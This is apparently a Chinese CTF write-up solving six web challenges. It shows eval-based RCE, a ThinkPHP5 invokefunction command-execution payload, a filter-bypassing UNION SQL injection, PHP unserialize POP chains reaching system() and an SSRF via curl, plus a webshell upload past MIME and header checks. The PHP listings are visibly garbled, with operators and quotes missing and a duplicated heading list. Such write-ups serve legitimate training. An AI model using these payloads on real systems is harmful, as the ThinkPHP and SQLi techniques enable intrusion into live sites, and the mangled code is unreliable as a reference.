①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power! 挑了部分题，太简单的就没选进来（但选进来≠有难度）
①webdog1__start 进来没啥东西，右键查看源码 对于0e215962017，md5后也是以…目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power! 挑了部分题，太简单的就没选进来（但选进来≠有难度）
①webdog1__start 进来没啥东西，右键查看源码。对于 0e215962017，md5 后也是以 0e 开头
?web0e215962017
跳转到/start.php 没啥信息这里bp抓包看响应头发现hint 访问/f14g.php 继续抓包发现hint(意义何在) 访问/F1l1l1l1l1lag.php /F1l1l1l1l1lag.php?getsystem(ls);
因为有长度限制所以我们尝试转接
/F1l1l1l1l1lag.php?geteval($_GET[1]);1system(tac flag.php);
回显 就是说flag在/flag里呗
/F1l1l1l1l1lag.php?geteval($_GET[1]);1system(tac /flag);
拿到flag ②ez_rce
进来先灵魂发问。懒得扫目录了，直接访问 /robots.txt，再访问 /NSS/index.php/，惊了，是 TP5
直接检索thinkphp5 漏洞原理分析合集
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls /flag ?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]tac /flag/flag
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls /flag/flag
均无回显
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]printenv
看环境变量 确定flag不在该文件下了
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]find / -name flag* ?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]tac /nss/ctf/flag/flag /flag /flag
拿到 flag。或者其实这类框架漏洞利用的题都是有相应工具能梭的。③ez_sql 提示用 POST 传参
简单测了一下：过滤了空格（用注释符绕过），union、or、and 双写绕过即可
nss1/**/oorrder/**/by/**/4#
nss999/**/ununionion/**/select/**/1,2,3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schemadatabase()),3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schemadatabase()/**/aandnd/**/table_nameNSS_tb),3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t,flll444g)/**/from/**/NSS_tb),3# ④ez_1zpop
?php
// NOTE(review): this listing lost its `=`, `->`, `&&`/`==` and quote tokens in
// extraction; read it for structure, not as runnable syntax.
error_reporting(0);
// dxg::fmm() just returns a string; it is the harmless target the other fmm() is
// swapped against.
class dxg
{function fmm(){return nonono;}
// lt: __wakeup re-pins `impo` to a fresh dxg, but __destruct echoes $this, which
// goes through __toString and, after the md5 comparison of md51/md52 (operators
// lost above — presumably an md5-equality check with a != guard), calls fmm() on
// whatever `impo` holds at that point.
}class lt
{public $impohi;public $md51weclome;public $md52to NSS;function __construct(){$this-impo new dxg;}function __wakeup(){$this-impo new dxg;return $this-impo-fmm();}function __toString(){if (isset($this-impo) md5($this-md51) md5($this-md52) $this-md51 ! $this-md52)return $this-impo-fmm();}function __destruct(){echo $this;}
// fin::fmm() invokes the value stored in `a` as a callable with `title` as its
// argument — this is the code-execution sink of the gadget chain.
}class fin
{public $a;public $url https://www.ctfer.vip;public $title;function fmm(){$b $this-a;$b($this-title);}
// Root cause: unserialize() is called directly on the NSS query parameter, so the
// whole object graph (including which class's fmm() ends up running) is user-controlled.
}if (isset($_GET[NSS])) {$Data unserialize($_GET[NSS]);
} else {highlight_file(__file__);
}
这个甚至不用搓链子，只要绕过一个 __wakeup 就可以
echo $this 可以直接触发 __toString
构造
$bnew fin();
$anew lt();
$a-impo$b;
$b-asystem;
$b-titletac /flag;
$a-md51s878926199a;
$a-md52s155964671a;
echo serialize($a);最终payload:
?NSSO:2:lt:4:{s:4:impo;O:3:fin:3:{s:1:a;s:6:system;s:3:url;s:21:https://www.ctfer.vip;s:5:title;s:9:tac /flag;}s:4:md51;s:11:s878926199a;s:4:md52;s:11:s155964671a;} ⑤file_master
进来页面可以读文件、可以传文件。?filename=index.php 看源码：MIME 检测、文件头检测、文件内容检测
改Content-Type: image/jpeg
文件头
#define height 1 #define width 1
php 用短标签即可。访问 /upload/hggmm3ekc10fc6arlp5d03oamr/yjh3.php
下略。⑥Power! 右键查看源码发现提示 ?source=index.php
看index.php源码
// NOTE(review): this listing was flattened onto one line and lost `=`, `->` and
// quotes. The original `//flag in /flag.php` comment has also swallowed the
// `if(is_string($path)...` code that followed it on the same line — that part is
// code, not comment.
// Defender view of what is visible here:
//  - path_info branch: unserialize(base64_decode($_GET[path_info])) accepts any
//    object graph from the request, then calls loadfile() on the result.
//  - FileViewer::__wakeup only re-pins `local` to http://127.0.0.1/; nothing stops
//    other code in the same request (Backdoor::goodman assigns `$i->$j`) from
//    reassigning it afterwards, so that reset is not an effective control.
//  - image_path branch: a scheme deny-list regex is the only filter before
//    file_get_contents($path); deny-lists on URL schemes are easy to miss cases on.
//  - Backdoor::__destruct calls a method on whatever `a` holds, which is how
//    FileViewer::__call (and from there loadfile()/curl()) becomes reachable.
?phpclass FileViewer{public $black_list flag;public $local http://127.0.0.1/;public $path;public function __call($f,$a){$this-loadfile();}public function loadfile(){if(!is_array($this-path)){if(preg_match(/.$this-black_list./i,$this-path)){$file $this-curl($this-local.cheems.jpg);}else{$file $this-curl($this-local.$this-path);}}else{$file $this-curl($this-local.cheems.jpg);}echo img srcdata:jpg;base64,.base64_encode($file)./;}public function curl($path){$url $path;$curl curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, 0);$response curl_exec($curl);curl_close($curl);return $response;}public function __wakeup(){$this-local http://127.0.0.1/;}}class Backdoor{public $a;public $b;public $superhacker hacker.jpg;public function goodman($i,$j){$i-$j $this-superhacker;}public function __destruct(){$this-goodman($this-a,$this-b);$this-a-c();}}if(isset($_GET[source])){highlight_file(__FILE__);}else{if(isset($_GET[image_path])){$path $_GET[image_path]; //flag in /flag.phpif(is_string($path)!preg_match(/http:|gopher:|glob:|php:/i,$path)){echo img srcdata:jpg;base64,.base64_encode(file_get_contents($path))./;}else{echo h2Seriously??/h2img srcdata:jpg;base64,.base64_encode(file_get_contents(cheems.jpg))./;}}else if(isset($_GET[path_info])){$path_info $_GET[path_info];$FV unserialize(base64_decode($path_info));$FV-loadfile();}else{$path vergil.jpg;echo h2POWER!!/h2img srcdata:jpg;base64,.base64_encode(file_get_contents($path))./;}}
? ?image_pathflag.php
点开 echo 的链接，flag 被放在了 127.0.0.1:65500，外网无法访问
看来要用SSRF了
搓链子
FileViewer - Backdoor::__destruct() - FileViewer::__call() - FileViewer::loadfile() - FileViewer::curl()
注意程序在 unserialize 之后会调用 $FV->loadfile();，如果 $FV 不是 FileViewer 类的实例则会抛出异常，导致 Backdoor 类的 __destruct 不会成功执行。解决方法就是再实例化一个 FileViewer 对象，将 Backdoor 塞进这个对象的某个属性里（PHP 可以反序列化出不存在的属性）。
构造
?php
class FileViewer{public $local http://127.0.0.1:65500/;public $path ;
}class Backdoor{public $a;public $b;public $superhacker;
}$y new FileViewer();
$x new Backdoor();
$x-a $y;
$x-b local;
$x-superhacker http://127.0.0.1:65500/;
$z new FileViewer();
$z-test $x;
echo base64_encode(serialize($z));
payload:
?path_infoTzoxMDoiRmlsZVZpZXdlciI6Mzp7czo1OiJsb2NhbCI7czoyMzoiaHR0cDovLzEyNy4wLjAuMTo2NTUwMC8iO3M6NDoicGF0aCI7czowOiIiO3M6NDoidGVzdCI7Tzo4OiJCYWNrZG9vciI6Mzp7czoxOiJhIjtPOjEwOiJGaWxlVmlld2VyIjoyOntzOjU6ImxvY2FsIjtzOjIzOiJodHRwOi8vMTI3LjAuMC4xOjY1NTAwLyI7czo0OiJwYXRoIjtzOjA6IiI7fXM6MToiYiI7czo1OiJsb2NhbCI7czoxMToic3VwZXJoYWNrZXIiO3M6MjM6Imh0dHA6Ly8xMjcuMC4wLjE6NjU1MDAvIjt9fQ